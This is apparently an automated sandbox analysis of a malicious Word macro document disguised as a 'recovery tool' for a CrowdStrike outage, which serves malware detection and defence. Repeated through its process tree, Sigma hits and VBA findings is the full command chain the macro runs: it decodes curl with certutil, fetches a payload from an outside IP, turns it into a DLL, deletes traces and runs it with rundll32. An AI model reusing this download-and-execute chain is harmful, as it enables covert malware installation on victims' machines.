Edit tour

Windows Analysis Report
New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Overview

General Information

Sample name:	New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
Analysis ID:	1478411
MD5:	dd2100dfa067caae416b885637adc4ef
SHA1:	499f8881f4927e7b4a1a0448f62c60741ea6d44b
SHA256:	803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61
Tags:	docm
Infos:

Detection

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Document contains VBA stomped code (only p-code) potentially bypassing AV detection

Document contains an embedded VBA macro which may execute processes

Document contains an embedded VBA macro with suspicious strings

Document contains an embedded VBA with many string operations indicating source code obfuscation

Document exploit detected (process start blacklist hit)

Downloads suspicious files via Chrome

Machine Learning detection for dropped file

Sigma detected: Legitimate Application Dropped Executable

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Sigma detected: Suspicious Microsoft Office Child Process

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Document embeds suspicious OLE2 link

Document misses a certain OLE stream usually present in this Microsoft Office document type

Drops PE files

Found potential string decryption / allocating functions

IP address seen in connection with other malware

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sigma detected: Suspicious Copy From or To System Directory

Uses Microsoft's Enhanced Cryptographic Provider

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 1384 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

cmd.exe (PID: 300 cmdline: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

xcopy.exe (PID: 3096 cmdline: xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp MD5: 20CF8728C55A8743AAC86FB8D30EA898)

certutil.exe (PID: 3112 cmdline: certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt MD5: 4586B77B18FA9A8518AF76CA8FD247D9)

certutil.exe (PID: 3128 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe MD5: 4586B77B18FA9A8518AF76CA8FD247D9)

curl.exe (PID: 3136 cmdline: C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

certutil.exe (PID: 3152 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll MD5: 4586B77B18FA9A8518AF76CA8FD247D9)

rundll32.exe (PID: 3160 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain MD5: DD81D91FF3B0763C392422865C9AC12E)

chrome.exe (PID: 3236 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)

chrome.exe (PID: 3428 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1352 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)

chrome.exe (PID: 3224 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2208 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)

chrome.exe (PID: 300 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" "https://go.microsoft.com/fwlink/?linkid=2280386" MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)

WINWORD.EXE (PID: 300 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

cmd.exe (PID: 3616 cmdline: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

xcopy.exe (PID: 3644 cmdline: xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp MD5: 20CF8728C55A8743AAC86FB8D30EA898)

certutil.exe (PID: 3548 cmdline: certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt MD5: 4586B77B18FA9A8518AF76CA8FD247D9)

certutil.exe (PID: 3796 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe MD5: 4586B77B18FA9A8518AF76CA8FD247D9)

curl.exe (PID: 2432 cmdline: C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

certutil.exe (PID: 2724 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll MD5: 4586B77B18FA9A8518AF76CA8FD247D9)

rundll32.exe (PID: 2360 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain MD5: DD81D91FF3B0763C392422865C9AC12E)

cleanup

Sigma Signatures

System Summary

Sigma detected: Legitimate Application Dropped Executable

Source: File created

Author: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\certutil.exe, ProcessId: 3128, TargetFilename: C:\Users\user\AppData\Local\Temp\curl.exe

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Source: Threat created

Author: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, SourceProcessId: 300, StartAddress: 772EA280, TargetImage: C:\Windows\System32\cmd.exe, TargetProcessId: 300

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1384, ParentProcessName: WINWORD.EXE, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit,

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1384, ParentProcessName: WINWORD.EXE, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit,

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 1384, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

ReversingLabs: Detection: 26%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRC0001.tmp

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4D9BD0 CryptAcquireContextA,CryptCreateHash,
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4D9C20 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4D9C9C CryptHashData,
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F359BD0 CryptAcquireContextA,CryptCreateHash,
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F359C20 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F359C9C CryptHashData,

Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\GoogleUpdater	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_BITS_3236_441263539	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:

Binary string: curl.pdb source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000007.00000000.382535315.000000013F4DE000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\cmd.exe

Source: Joe Sandbox View

IP Address: 239.255.255.250 239.255.255.250

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 7_2_000000013F4A2738 recv,WSAGetLastError,

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9512A27C-373D-4C6D-8C25-ECB66CCA249E}.tmp

Jump to behavior

Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000007.00000000.382535315.000000013F4DE000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe.4.dr	String found in binary or memory: Usage: curl [options...] <url>

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: sb-ssl.google.com

Source: unknown

HTTP traffic detected: POST /safebrowsing/clientreport/download?key=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: sb-ssl.google.comConnection: keep-aliveContent-Length: 1073Content-Type: application/octet-streamSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br

Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr	String found in binary or memory: http://172.104.160.
Source: vbaProject.bin	String found in binary or memory: http://172.104.160.126:8099
Source: curl.exe, 00000016.00000002.523173521.0000000000070000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.104.160.126:8099/payload2.txt
Source: vbaProject.bin	String found in binary or memory: http://172.104.160.126:80X99
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	String found in binary or memory: https://aka.ms/WRH
Source: document.xml	String found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exe
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	String found in binary or memory: https://azure.status.microsoft/status
Source: curl.exe	String found in binary or memory: https://curl.se/
Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000000.382543301.000000013F500000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519441459.000000013F380000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	String found in binary or memory: https://curl.se/P
Source: curl.exe	String found in binary or memory: https://curl.se/docs/copyright.html
Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000000.382543301.000000013F500000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519441459.000000013F380000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	String found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	String found in binary or memory: https://curl.se/docs/hsts.html
Source: curl.exe	String found in binary or memory: https://curl.se/docs/hsts.html#
Source: curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: curl.exe	String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	String found in binary or memory: https://curl.se/docs/sslcerts.html
Source: curl.exe	String found in binary or memory: https://curl.se/docs/sslcerts.htmlcurl
Source: curl.exe.4.dr	String found in binary or memory: https://curl.se/libcurl/c/curl_easy_setopt.html
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	String found in binary or memory: https://www.crowdstrike.com/blog/statement-on-falcon-content-update-for-windows-hosts/
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	String found in binary or memory: https://www.intel.com/content/www/us/en/support/articles/000054990/intel-nuc/intel-nuc-kits.html

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443

System Summary

Document contains an embedded VBA macro which may execute processes

Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, API IWshShell3.Run("C:\Windows\System32\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit",0:Integer,False)
Source: ~WRC0001.tmp.16.dr	OLE, VBA macro line: JbxHook_Run_3__ob = jbxthis.Run(jbxparam0, jbxparam1, jbxparam2)

Document contains an embedded VBA macro with suspicious strings

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: ' Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: ' Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: dir = Environ("temp")
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: pp = pp + "tem32\cmd.exe /c "
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: 'pp = pp + "cmd.exe -d & exit"
